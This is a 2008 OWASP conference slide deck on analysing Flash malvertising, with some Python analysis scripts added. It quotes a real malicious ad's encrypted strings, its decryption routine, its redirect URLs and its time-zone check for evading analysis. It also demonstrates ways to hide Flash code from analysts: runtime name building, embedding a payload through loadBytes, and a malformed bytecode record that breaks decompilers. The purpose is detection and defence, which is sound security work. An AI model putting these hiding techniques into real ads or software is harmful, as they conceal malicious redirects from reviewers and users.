Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

OWASP Asia Pacific Conference 2008

The Detection and Analysis of Flash Based Malware

Paul Theriault, Senior Associate - SIFT, [email protected]

Feb 2008


About me

Paul Theriault
Security consultant with SIFT (www.sift.com.au)
Web app penetration tester
Code review and developer training
Security researcher


Background

Flash is a commonly used format for rich media on the internet.

Flash “movies” aren’t really movies: they are application byte-code to be executed by the Flash Player runtime environment.

Many websites accept third-party Flash content:
Advertising networks
Gaming websites (Kongregate, Newgrounds…)
Graphic design/art sites (Flash Kit, Deviantart…)
Others: any forum with SWF avatars etc.

3rd party Flash movies may contain malicious code.

How can you tell?


Talk Outline

1. Flash based malware
Background
Introduction to malware case study

2. Analysis Methods
Disassembly
Decompiling
Runtime Analysis

3. Counter Analysis Methods
Obfuscation & Stack Manipulation
Dynamically Loading Content


Flash Advertising

Flash has become a common format for web advertisements.

Advertising organisations must accept third-party content, which may be malicious.

The attacker only needs to achieve redirection of the user to a malicious site – and ads are supposed to redirect users!

Ads are also often allowed to contact third-party servers for tracking purposes.


Rise in “Malvertising”

Malvertising: spreading malware by convincing sites to host malicious advertisements
http://isc.sans.org/diary.html?storyid=3727

Major advertising organisations affected
Typical method is to force the victim to a malicious website
Old problem, new(ish) vector:
http://msmvps.com/spywaresucks
www.mikeonads.com


“SkyAuction/BlessedAds/Errorsafe” Malware

Seen since March 2007 across many organisations

Gained widespread media attention in November with major internet properties affected

Fictitious Flash advertisement which redirects the visitor to a malicious website without user interaction

Note: the Flash file doesn’t exploit any vulnerability. It used encryption and obfuscated programming techniques to hide function calls and URLs.


Analysis Methods


Analysis of Flash Content

Flash Overview

Static Analysis
Bytecode level analysis
ActionScript analysis
Focus on the ActionScript portions of the SWF file

Runtime Analysis


SWF Introduction

function TestLoader() {
  loader=new Loader();
  configureListeners(loader.contentLoaderInfo);
  //loader.load(new URLRequest('badware.swf'));
  var ba:ByteArray=new ByteArray();
  //the binary on this line is badware.swf encoded (the array is truncated on the slide)
  var badware:Array=[67,87,83,7,195,3,0,0,120,218,124
  for(var i:int=0;i<badware.length;i++){ba.writeByte(badware[i]);}
  loader.loadBytes(ba);
}


1557 label
1558 debugline
1560 getlocal1
1561 getlocal2
1562 getlocal3
1563 getproperty
1565 callpropvoid
1568 debugline
1570 inclocal_i
L1:
1572 getlocal3
1573 getlocal2
1574 getproperty
1576 iflt

(Diagram: SWF -> ActionScript -> Flash Player)


SWF Format

SWF Format contains images, sounds, video clips AND ActionScript bytecode (ABC) in a series of tagged data blocks:

(Diagram: Header … | FileAttributes tag | Tag | Tag | … | End tag)

2 types of tags: Definition & Control
Definition: defines content – shapes, texts, sounds, script etc. – and assigns them a character ID.
Control: manipulates instances of content (instances of characters) and controls the flow of the file.

Complete specification for the SWF format available from:
http://www.adobe.com/licensing/developer/ (requires registration)


ActionScript Overview

Focus on the tags that contain ActionScript:
AS3: DoABC
AS2: DoAction, DoInitAction, DefineButton2

ActionScript byte code: a sequence of actions on the virtual machine state.

Specification for AVM2 bytecode here:
http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf


ActionScript Overview

(Diagram: the Flash Player hosts the ActionScript Virtual Machine; ByteCode goes in, Output comes out. Parts of the AVM:)

Method Information: method usage instructions (e.g. handling of default args)
Local Data Area: Operand Stack, Scope Stack, Local Registers
Runtime Environment: chain of named objects
Constant Pool: numbers, strings, various names
Heap: objects created at runtime


Tools for static analysis

Hex editor

Flasm: ActionScript bytecode assembler/disassembler

SWFMILL: converts SWF to XML and vice versa

ActionScript decompiler:
Flare (AS2)
AVMPlus (AS3) – compiled from Tamarin
https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Using_Tamarin


SWF Deconstructed

ActionScript:
var url = 'http://www.sift.com.au';
getURL(url, '_self');

FLASM:
frame 0
  constants 'url', 'http://www.sift.com.au', '_self'
  push c:0, c:1
  varEquals
  push c:0
  getVariable
  push c:2
  getURL2
end // of frame 0

SWF (hex):
46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00

XML (swfmill):
<strings>
  <String value="url" />
  <String value="http://www.sift.com.au" />
  <String value="_self" />
</strings>
...
<PushData><items><StackDictionaryLookup index="0" /></items></PushData>
<GetVariable />
<PushData><items><StackDictionaryLookup index="2" /></items></PushData>
<GetURL2 method="0"/>


SWF Deconstructed

FLASM, with the operand stack shown after each action:
frame 0
  constants 'url', 'http://www.sift.com.au', '_self'
  push c:0, c:1      // stack: {“http://www.sift.com.au”, “url”}
  varEquals          // stack: {}
  push c:0           // stack: {“url”}
  getVariable        // stack: {“http://www.sift.com.au”}
  push c:2           // stack: {_self, http://www.sift.com.au}
  getURL2
end // of frame 0


Byte code analysis

SWFs are usually compressed. Look at the first 3 bytes:
CWS = compressed
FWS = non-compressed

Use 'flasm -x movie.swf' to decompress.

Open the SWF in a hex editor: some unusual strings, but difficult to read in this format.


SWFmill

Available from http://swfmill.org

Converts SWF into XML (and XML to SWF)

Much easier to read than hex, but very large files: 50k of malware becomes 6000 lines of XML

Includes graphic data

Less information than decompiling, but more resilient to obfuscation


SWFmill

Constants pool from the malware:
<String value="getTime"/>
<String value="loadVariables"/>
<String value="i"/>
<String value="setInterval"/>
<String value="stats"/>
<String value="clearInterval"/>
<String value="LoadVars"/>
<String value="so"/>

Difficult to determine where it's used in this view.


FLASM

FLASM is an ABC disassembler, available from http://www.nowrap.de/flasm.html

It describes the ActionScript present in the SWF file in terms of virtual machine actions: push, pop, add, callmethod, jump etc.

FLASM provides lower-level analysis and helps with understanding exactly what is going on inside the AVM.


FLASM analysis

Looking at the “Constants Pool” in the malware:

constants '_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8', 'c4', '50E70523', 'c5', '7FD7153B7080E795EA776F', 'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956972D2F50252B6269', 'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3', 'c14', 'c15', '0DB1', 'c16', 'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBB7746D368E0268C2', 'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F', 'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91', 'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833', 'c29', '47ED0203708EE9B0F06B666C9C2317CAA0', 'String', 'prototype', 'color', 'eslogan', 'result', '', 'n', 'this', 'length', 'slice', 'parseInt', 'fromCharCode', '_visible', 'getNextHighestDepth', 'emc', 'createEmptyMovieClip', 'u', 'dt', 'getTime', 'loadVariables', 'i', 'setInterval', 'stats', 'clearInterval', 'LoadVars', 'so', 'SharedObject', 'getLocal', 'data', 'uzhe', 'exp', 'Date', 'cr', 'expires', 'flush', 'lim', 'r', 'view'

Looks a bit fishy…


FLASM analysis

Can also see where it's called:
push 3, 0.0, 'LoadVars'
new
push 14688422, 1, r:1, 'c28'
getMember
push 'color'
callMethod
callMethod

Calling a function called ‘color’ prior to calling LoadVars.


ActionScript Analysis

FLARE (http://www.nowrap.de/flare.html) decompiles SWF files (AS2 only) to ActionScript.

Manually trace the ActionScript for malicious behaviour:
Functions which connect remotely
Look for strange behaviours

Provides a much better view of what is going on.


ActionScript Analysis

Examine where the strange strings are assigned:
_root.c1 = '47ED02';
_root.c2 = '46E91A247C';
_root.c3 = '7FF817257C8DF8';
_root.c4 = '50E70523';
_root.c5 = '7FD7153B7080E795EA776F';
_root.c6 = '48FC022723CCA3A8F36070509F2105CBA738D20F5…

Now searching for where they are used:
(new LoadVars())[v1.c28.color(14688422)](v1.c6.color(14688422), v1.c3.color(14688422), v1.c4.color(14688422));

So we know it is opening a location, but where?


ActionScript Analysis

The String.color() function is actually a decryption method:

String.prototype.color = function (eslogan) {
  var v3 = eslogan;
  var result = '';
  var v1;
  var n;
  var v2;
  v1 = 0;
  n = this.length;
  while (v1 < n) {
    v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255;
    if (v2 > 127) {
      v2 += 848;
    }
    result += String.fromCharCode(v2);
    v3 = (v3 * 52845 + 22719) % 16777215;
    v1 += 2;
  }
  return result;
};

Decryption key: the eslogan argument.


ActionScript Analysis

Compile and run the decryption algorithm across the mystery variables:
c1: get
c2: false
c3: _parent
c4: post
c5: __click_url
c6: http://blessedads.com/?cmpid=master0n
c7: 1
c8: 0
c9: 0
c10: 1
c11: 0
c12: 7
c13: http://
c14: 0
c15: -9
c16: 0
c17: http://mysurvey4u.com/stats.php?campaign=master0n
c18: 40
c19: master0nintl8112007
c20: /
c22: __tz
c23: _url
c24: substr
c25: __ftz
c26: __flv
c27: __fchk
c28: send
c29: getTimezoneOffset
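As an added example that is not part of the slides, the String.prototype.color routine ported to Python and run over the cN constants from the FLASM constant-pool slide, with the key 14688422 taken from the decompiled call site; color, decrypt_pool, HEX and POOL are names chosen here.

```python
# Added example (not from the slides): the malware's String.prototype.color routine ported to
# Python and run over the 'cN' constants from the FLASM constant pool slide, with the key
# 14688422 read off the decompiled call site v1.c28.color(14688422).
import re

KEY = 14688422

def color(hexstr, key=KEY):
    """Port of String.prototype.color: each hex-encoded byte is XORed with bits 8..15 of a
    24-bit LCG state; results above 127 are shifted by 848 (cp1251 Cyrillic to Unicode)."""
    v3, out = key, []
    for i in range(0, len(hexstr), 2):
        v2 = int(hexstr[i:i + 2], 16) ^ ((v3 >> 8) & 255)
        if v2 > 127:
            v2 += 848
        out.append(chr(v2))
        v3 = (v3 * 52845 + 22719) % 16777215       # the same LCG step as the ActionScript
    return "".join(out)

HEX = re.compile(r"(?:[0-9A-F]{2})+")

def decrypt_pool(pool, key=KEY):
    """Decrypt every 'cN' constant that is followed in the pool by its hex value. Names with
    no value after them (c9, c10, ...) are skipped: the slide's table shows they are '0' or
    '1', whose hex forms '10' and '11' already appear once in the pool."""
    return {name: color(value, key) for name, value in zip(pool, pool[1:])
            if re.fullmatch(r"c\d+", name) and HEX.fullmatch(value)}

# The constant pool as the 'FLASM analysis' slide prints it (the encrypted part only).
POOL = ['_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8', 'c4', '50E70523',
        'c5', '7FD7153B7080E795EA776F',
        'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956972D2F50252B6269',
        'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3',
        'c14', 'c15', '0DB1', 'c16',
        'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBB7746D368E0268C2',
        'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F',
        'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91',
        'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833',
        'c29', '47ED0203708EE9B0F06B666C9C2317CAA0']

if __name__ == "__main__":
    for name, text in decrypt_pool(POOL).items():
        print(name, text)
```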


ActionScript Analysis

Substituting these decrypted strings back into the original file reveals the calls:

v1.emc.loadVariables("http://mysurvey4u.com/stats.php?campaign=master0n", "get");

(new LoadVars())["send"]("http://blessedads.com/?cmpid=master0n", "_parent", "post");


Interesting Classes and Functions (AS2)

Global Functions: asfunction, ASnative, chr, escape, eval, fscommand, getTimer, getURL, loadMovie, loadMovieNum, loadVariables, mbchr, mbord, mbsubstring, MMExecute, setInterval, setTimeout, unescape

Global Properties: _global, _level, _root

Classes: System.capabilities, ExternalInterface, LoadVars, LocalConnection, MovieClipLoader, NetConnection, NetStream, System.security, XML, XMLSocket

Functions: XML.load, StyleSheet.load, LoadVars.load, LoadVars.send, LocalConnection.send, PrintJob.send, XML.send, XMLSocket.send, XML.sendAndLoad, LoadVars.sendAndLoad, FileReference.upload, FileReference.download


Interesting Classes and Functions (AS3)

Classes: flash.display.Loader, flash.external.ExternalInterface, flash.media.Sound, flash.media.Video, flash.net.LocalConnection, flash.net.NetConnection, flash.net.NetStream, flash.net.SharedObject, flash.net.Socket, flash.net.URLLoader, flash.net.URLRequest, flash.net.URLStream, flash.net.XMLSocket, flash.system.Security, flash.system.LoaderContext, flash.utils.ByteArray, flash.utils.Timer

Functions: flash.net.navigateToURL, flash.net.sendToURL, flash.net.registerClassAlias, flash.system.fscommand, flash.utils.setInterval, flash.utils.setTimeout, flash.utils.getDefinitionByName, flash.utils.getQualifiedClassName, flash.utils.getQualifiedSuperclassName, flash.utils.getTimer, flash.utils.unescapeMultiByte


Runtime Analysis

Load the file and use a proxy to observe (and limit!) network interactions.

Obviously better to do this on an isolated test machine.

This malware tries to evade dynamic analysis: it only connects to the malicious website when the movie is loaded via http, AND the local time zone is a specific value:

_root["__tz"] = -(new Date())["getTimeZoneOffset"]() / 60;
if (_root["_url"]["substr"](parseInt(0), parseInt(7)) == "http://" && !(_root["__tz"] >= -9 && _root["__tz"] <= 0)) {


Advanced Runtime Analysis via debugger

Many debug tools are available for Flash:
fdb (http://labs.adobe.com/technologies/flex/sdk/)
Ofd-net (ALPHA - http://sourceforge.net/projects/ofd-net)

Requires the Debug Flash Player: http://www.adobe.com/support/flashplayer/downloads.html

For a 3rd party SWF, where do you get the debug file (SWD)?
“swf2swd.exe” from Nikos Kastellanos (ofd-net author, above URL)

Also need to enable debugging: UnlockSWF (http://www.buraks.com/unlockswf/)

However, swf2swd has problems with malformed Flash files… work required to develop a robust SWD extractor.


Runtime Analysis

Issues with runtime analysis:
Difficult to automate
Have to execute potentially dangerous code
Relies on observing external interactions (until debugging tools are more mature)

Other runtime analysis tools:
SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder
Erlswf: http://pentaphase.de/index.php?/archives/29-Erlang-unscrables-SWF.html


Counter Analysis Methods


Counter-Analysis

Create class and function names at runtime

Embedding code at runtime

Code obfuscation


Class names at runtime

Basic static analysis relies on locating key function and class names.

Classes can be instantiated from strings using:
AS2: var myClass = _global['LoadVars'];
AS3: var ClassReference:Class = getDefinitionByName("flash.display.Loader") as Class;

For example:
var f=String.fromCharCode;
var a=f(76); a+=f(111); a+=f(97); a+=f(100); a+=f(86); a+=f(97); a+=f(114); a+=f(115);
(new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');


Function Names At Runtime

Works for function names too:
var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76)))));
_root[v3]('http://www.sift.com.au', '_parent', 'post');

The string ‘getURL’ no longer appears in the file.


ASnative

ASnative is an undocumented function: it calls AS2 functions using reference numbers, as if all functions existed in a spreadsheet.

Can be used instead of the real function names:
var escapeFunction=_global["ASnative"](100, 0);

Examples:
ASnative(253, 7) - [_global] XML
ASnative(301, 0) - [XML.prototype] load
ASnative(100, 0) - [_global] escape

http://osflash.org/flashcoders/undocumented/asnative
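An added example (not from the slides) that undoes the three name-hiding tricks shown on the last three slides on decompiled AS2 text: chr()/fromCharCode concatenation, the a+= accumulator, and ASnative(i, j) indices, using only the three pairs the ASnative slide lists. reveal_names, FOLD_RULES, ASNATIVE and the three sample constants are names chosen here.

```python
# Added example (not from the slides): fold the runtime name-building from the 'Class names at
# runtime', 'Function Names At Runtime' and 'ASnative' slides back into plain strings, so a
# search for getURL or LoadVars works again on decompiled AS2 source. Regex-based, so it only
# handles the shapes shown on those slides.
import re

# ASnative (index, sub-index) pairs listed on the ASnative slide; others are left untouched.
ASNATIVE = {(253, 7): "XML", (301, 0): "XML.prototype.load", (100, 0): "escape"}
FOLD_RULES = [
    (re.compile(r"'([^']*)'\s*\+\s*'([^']*)'"), r"'\1\2'"),                          # 'a' + 'b'
    (re.compile(r"(?<![\w\]])\(\s*('[^']*')\s*\)"), r"\1"),                           # ('a') -> 'a'
    (re.compile(r"(\w+)\s*=\s*'([^']*)';\s*\1\s*\+=\s*'([^']*)';"), r"\1='\2\3';"),  # a='x'; a+='y';
]

def reveal_names(src):
    """Return (rewritten source, sorted string literals of 2+ chars found afterwards)."""
    # 1. chr(n) and every alias of String.fromCharCode become a one-character literal.
    makers = ["chr"] + re.findall(r"var\s+(\w+)\s*=\s*String\.fromCharCode\b", src)
    call = re.compile(r"\b(?:%s)\((\d+)\)" % "|".join(map(re.escape, makers)))
    src = call.sub(lambda m: "'%s'" % chr(int(m.group(1))), src)
    # 2. Merge adjacent literals, strip redundant parentheses and collapse a+= chains
    #    until a pass changes nothing (the nested chr() form needs several passes).
    changed = True
    while changed:
        changed = False
        for pat, repl in FOLD_RULES:
            src, n = pat.subn(repl, src)
            changed = changed or n > 0
    # 3. ASnative(i, j) calls that the slide maps are replaced by the function they stand for.
    src = re.sub(r'(?:_global\[["\']ASnative["\']\]|ASnative)\((\d+),\s*(\d+)\)',
                 lambda m: ASNATIVE.get((int(m.group(1)), int(m.group(2))), m.group(0)), src)
    # 4. Indexing through a variable that now holds a literal: _root[v3] -> _root['getURL'].
    for name, val in re.findall(r"(\w+)\s*=\s*'([^']*)';", src):
        src = re.sub(r"\[%s\]" % re.escape(name), lambda m, v=val: "['%s']" % v, src)
    return src, sorted(set(re.findall(r"'([^']{2,})'", src)))

# The three snippets as the slides print them (line breaks restored).
CLASS_NAME = ("var f=String.fromCharCode;\nvar a=f(76); a+=f(111); a+=f(97); a+=f(100); "
              "a+=f(86); a+=f(97); a+=f(114); a+=f(115); "
              "(new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');")
FUNC_NAME = ("var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76))))); "
             "_root[v3]('http://www.sift.com.au', '_parent', 'post');")
NATIVE = 'var escapeFunction=_global["ASnative"](100, 0);'

if __name__ == "__main__":
    for snippet in (CLASS_NAME, FUNC_NAME, NATIVE):
        print(*reveal_names(snippet), sep="\n    ")
```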


Embedding Code

Another method of hiding code is to load the malicious code at runtime.

However, loading code from an external site is obvious to runtime analysis.

The alternative is to embed the data within the file and load it at runtime.

One way to achieve this is to use the flash.display.Loader.loadBytes() method.


Embedding code

loader=new Loader();
configureListeners(loader.contentLoaderInfo);

//create a byteArray containing our malicious swf
var ba:ByteArray=new ByteArray();
var badware:Array=[67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6, … 181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,137,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29];
for(var i:int=0;i<badware.length;i++){
  ba.writeByte(badware[i]);
}

//load the swf
loader.loadBytes(ba);


Embedding code

Only remaining evidence is:
Use of the Loader class
Pushing a massive array on the stack

Hiding the use of the Loader class: use dynamic class creation as discussed previously

Hiding the data:
Encrypt/encode values
Embed the values in an image (could also use steganography techniques)


Obfuscation

Many techniques available from efforts to secure Flash movie source code:
ActionScript obfuscation
Bytecode obfuscation

ActionScript obfuscation: use confusing variable names – numbers and non-displayable characters


Bytecode obfuscation

The Flash AVM executes bytecodes one by one, whereas a decompiler breaks the bytecode into meaningful pieces.

We can exploit this to confuse decompilers.

The malicious script we want to hide:
var foo="getURL";
_root[foo]('http://www.sift.com.au', '_parent', 'post');


Bytecode obfuscation

Converted to action records this becomes:
constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'
push 'foo', 'getURL'
varEquals
push 'post', '_parent', 'http://www.sift.com.au', 3, '_root'
getVariable
push 'foo'
getVariable
callMethod
pop


Bytecode obfuscation

Using a malformed push record, we hide the data from decompilers:
push ‘junk’
label1:
constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'
push 'foo', 'getURL'
varEquals
push 'post', '_parent', 'http://www.sift.com.au', 3, '_root'
getVariable
push 'foo'
getVariable
callMethod
pop
branch label2
branch label1
label2:

Manually change the size of the push ‘junk’ record.


Bytecode Obfuscation

SWF (unaffected):
46 57 53 08 95 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 6B 00 00 00 96 61 00 17 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00 96 04 00 08 00 08 01 3C 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C 96 02 00 08 00 1C 52 17 99 02 00 05 00 99 02 00 9B FF 17 …

XML (error, but successful):
<PushData> <items/></PushData>

FLASM:
frame 0
  push ??? // unknown push type 23: rest of push skipped
label1: // Wild label in the middle of an action, now placed before next action
  branch label1
  pop
end // of frame 0

ActionScript:
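As an added example that is not part of the slides, a small Python triage script that does what the 'Byte code analysis', 'FLASM analysis' and 'Bytecode obfuscation' slides do by hand: it checks the FWS/CWS signature, inflates a CWS body, walks the tag stream to the DoAction tags, lists the constant-pool strings and action opcodes, and flags a Push record whose type byte is unknown (flasm's "unknown push type"). It is fed the 102-byte getURL SWF from the 'SWF Deconstructed' slide and a constructed CWS that wraps those same actions in a junk push; every function and constant name is chosen here, and it handles AS2 DoAction tags only.

```python
# Added example (not from the slides): SWF triage in Python, AS2 DoAction tags only (no DoABC).
import struct
import zlib
ACTION_NAMES = {0x1C: "GetVariable", 0x3C: "DefineLocal", 0x88: "ConstantPool", 0x96: "Push", 0x9A: "GetURL2"}
PUSH_SIZES = {0: None, 1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}  # None: C string

def load_swf(data):
    # The first three bytes say whether the body is zlib-compressed (CWS) or not (FWS).
    sig, version, length = data[:3], data[3], struct.unpack("<I", data[4:8])[0]
    if sig not in (b"FWS", b"CWS"):
        raise ValueError("not a SWF: signature %r" % sig)
    body = zlib.decompress(data[8:]) if sig == b"CWS" else data[8:]
    if len(body) + 8 != length:                     # the header length counts the inflated file
        raise ValueError("header says %d bytes, got %d" % (length, len(body) + 8))
    return sig.decode(), version, body

def iter_tags(body):
    # Skip the RECT (5-bit Nbits + 4*Nbits bits) and the two UI16s (frame rate, frame count).
    pos = (5 + 4 * (body[0] >> 3) + 7) // 8 + 4
    while pos + 2 <= len(body):                     # RECORDHEADER: tag code in the top 10 bits
        head = struct.unpack("<H", body[pos:pos + 2])[0]
        code, length, pos = head >> 6, head & 0x3F, pos + 2
        if length == 0x3F:                          # long header: a UI32 length follows
            length, pos = struct.unpack("<I", body[pos:pos + 4])[0], pos + 4
        yield code, body[pos:pos + length]
        pos += length

def scan_actions(actions):
    """Walk one DoAction body; return (constant pool strings, opcode names, warnings)."""
    pool, ops, warnings, pos = [], [], [], 0
    while pos < len(actions) and actions[pos] != 0:  # 0x00 is ActionEnd
        code, pos, length = actions[pos], pos + 1, 0
        if code >= 0x80:                            # only these actions carry a UI16 length
            length, pos = struct.unpack("<H", actions[pos:pos + 2])[0], pos + 2
        payload, pos = actions[pos:pos + length], pos + length
        ops.append(ACTION_NAMES.get(code, "0x%02X" % code))
        if code == 0x88:                            # ConstantPool: UI16 count, then C strings
            pool += [s.decode("latin-1") for s in payload[2:].split(b"\x00")[:-1]]
        elif code == 0x96:                          # Push: a run of (type, value) records
            i = 0
            while i < len(payload):
                size = PUSH_SIZES.get(payload[i], -1)
                if size == -1:                      # flasm's "unknown push type": a decompiler
                    warnings.append("%d-byte Push has unknown type 0x%02X" % (len(payload), payload[i]))
                    break                           # skips the rest of the record, so flag it
                i = payload.index(b"\x00", i + 1) + 1 if size is None else i + 1 + size
    return pool, ops, warnings

def triage(data):
    """Per-file summary of the facts an analyst checks before decompiling by hand."""
    sig, version, body = load_swf(data)
    report = {"signature": sig, "version": version, "pool": [], "ops": [], "warnings": []}
    for code, payload in iter_tags(body):
        if code == 12:                              # DoAction tag
            for key, found in zip(("pool", "ops", "warnings"), scan_actions(payload)):
                report[key] += found
    return report

# The 102-byte getURL sample from the 'SWF Deconstructed' slide, typed in as printed there
# (its hex spells the URL 'http:www.sift.com.au', and the pool length byte 0x21 agrees).
SAMPLE_FWS = bytes.fromhex(
    "46575308660000007800055F00000FA000000C01004411000000004302FFFFFF3F033C000000"
    "8821000300" "75726C00" "687474703A7777772E736966742E636F6D2E617500" "5F73656C6600"
    "96040008000801" "3C" "9602000800" "1C" "9602000802" "9A010000" "00" "40000000")
# Constructed input for the malformed-push trick on the 'Bytecode obfuscation' slides: the
# sample's real actions sit inside one Push whose first type byte (0x17) is junk, zlib-packed.
HIDDEN = SAMPLE_FWS[38:97]                          # the sample's actions minus ActionEnd
ACTIONS = b"\x96" + struct.pack("<H", 1 + len(HIDDEN)) + b"\x17" + HIDDEN + b"\x00"
BODY = SAMPLE_FWS[8:32] + b"\x3F\x03" + struct.pack("<I", len(ACTIONS)) + ACTIONS + b"\x40\x00\x00\x00"
OBFUSCATED = b"CWS\x08" + struct.pack("<I", 8 + len(BODY)) + zlib.compress(BODY)
```

Run triage() on each of the two constants: the first reports the three pool strings and GetURL2, the second reports nothing but the junk Push and a warning, which is exactly the signal worth queuing a file for manual analysis.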


Bytecode Obfuscation

This obfuscation technique is documented: http://www.gotoandplay.it/_articles/2004/04/swfProtection.php

Not a new technique, but the example has been seen in the wild.

The malware author read this article! The BlessedAds malware contains strings used in one of the examples on this page.

Some tools will detect these obfuscations (e.g. Manitu ASV).


Obfuscation seen in the wild

Flare decompile of the diepress.com malware (http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx):

// unknown tag 255 length 1
// unknown tag 777 length 3
movieClip 4680 {
  #initclip
  function () {
    for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) {
      return (164 % 511) * 5;
      var = -785 + ();
      for (;;) { for (;;) {


Goal of Analysis

Analysis to achieve detection

Reduce the risk that malicious content is served by your organisation: large reputational impact if malware is even associated with your organisation

Limitations:
Ad click-through targets are controlled by third parties. Cannot prevent an attacker modifying the target site to be malicious.
Same issue if third-party interactions are allowed in the background.


Addressing the risk

Contractual Controls
“Terms of use” approach
Complicated chain of supply - federated ads

Reactive Controls
Mechanism for users to report malicious ads
Effective incident response program

Technical Controls
Need to determine exact program functionality
Signal detection problem – malicious ads can be very similar to legitimate ads


What about volume?

Even basic obfuscation results in very time-consuming manual analysis.

Advertising organisations are dealing with thousands of campaigns, each with their own creatives.

Questions to ask:
Why would a legitimate ad use obfuscation?
Why would a legitimate ad call certain functions or class names?

Can use an automated approach to find suspicious files to be marked for further analysis.


Recommendations

Develop a combination of automated and manual analysis procedures to increase detection of malicious advertisements

Use ad templates to restrict available functionality and make analysis easier

Require the 3rd party to provide source code

Implement good incident detection and response processes


Questions?


SIFT Pty Ltd – Australia

The detection and analysis of Flash based malware

Paul Theriault [[email protected]]